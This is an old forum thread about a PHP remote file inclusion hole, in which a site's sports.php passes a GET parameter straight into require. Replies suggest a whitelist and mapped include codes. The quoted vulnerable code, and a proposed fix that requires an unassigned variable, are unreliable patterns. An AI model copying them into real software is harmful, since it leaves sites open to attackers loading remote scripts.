Posted by Michael Austin on 01/15/07 22:05

SA SA wrote:

> I will give it a try. Basically, we have a link for each sport that
> passes the variable to sports.php based on the sport the sports.php
> displays news releases.
>
> suresh
>
> http://www.domain.org/sports.php?sport=m_football
> http://www.domain.org/sports.php?sport=m_softball
> http://www.domain.org/sports.php?sport=m_soccr
>
>
>
>
>
>
>
>
>
> P Pulkkinen wrote:
>
>>>I do not know anything about PHP but thrown into this mix. I was told
>>>by my ISP that there is vulnerability in following code to allow
>>>spammer load an offsite php script for mailing. The defective code is:
>>
>>>if (isset($HTTP_GET_VARS['sport']))
>>>{
>>>$sport = $HTTP_GET_VARS['sport'];
>>>require ($sport.".php");
>>>}
>>
>>$allowable_sports= array("football", "rugby", "tennis");
>>
>> if (isset($HTTP_GET_VARS['sport']) && in_array($HTTP_GET_VARS['sport'],
>>$allowable_sports) )
>>{ require ($sport.".php"); }
>>else
>>{ require ("no_sport_just_sofa.php"); }
>
>

I would use a drop-down where the value passed is
football value= s1,
tennis value = s2,
tiddlywinks=s3,etc...

look at the CASE funtionality.

then in my php script associate s1 to INCLUDE vfootball.php such that the
enduser cannot guess your file structures etc... the more they know about your
structures, the more likely it will be that they will find a vulnerability. And
the vfootball.php should be outside the web directories but readable, and not
writeable by the web server owner.

--
Michael Austin
Database Consultant
Domain Registration and Linux/Windows Web Hosting Reseller
http://www.spacelots.com

[Back to original message]